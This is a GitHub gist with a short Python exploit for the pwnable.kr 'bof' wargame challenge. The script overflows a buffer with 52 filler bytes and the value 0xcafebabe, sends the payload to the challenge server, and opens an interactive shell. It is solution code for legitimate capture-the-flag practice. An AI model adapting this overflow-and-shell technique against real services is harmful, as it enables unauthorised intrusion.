plvhx/README.md

Created September 16, 2016 23:46

Star (0) You must be signed in to star a gist
Fork (1) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/plvhx/6c7b5eddea2acb149d9bff619d1ae7ea.js"></script>
Save plvhx/6c7b5eddea2acb149d9bff619d1ae7ea to your computer and use it in GitHub Desktop.

pwnable.kr bof

Raw

#! /usr/bin/python

# tesla_ ([email protected])

import sys
import struct
import socket
import telnetlib

if sys.byteorder == 'little':
    Q = lambda x: struct.pack("<I", x)
elif sys.byteorder == 'big':
    Q = lambda x: struct.pack(">I", x)
    
payload = "\x41"*(52) + Q(0xcafebabe)

try:
    s = socket.create_connection(("pwnable.kr", 9000))
except socket.gaierror as e:
    (n, q) = e
    
    sys.exit(-1)
    
try:
    s.send(payload)
except socket.error as e:
    (n, q) = e
    
    sys.exit(-1)
    
t = telnetlib.Telnet()
t.sock = s
t.interact()

s.close()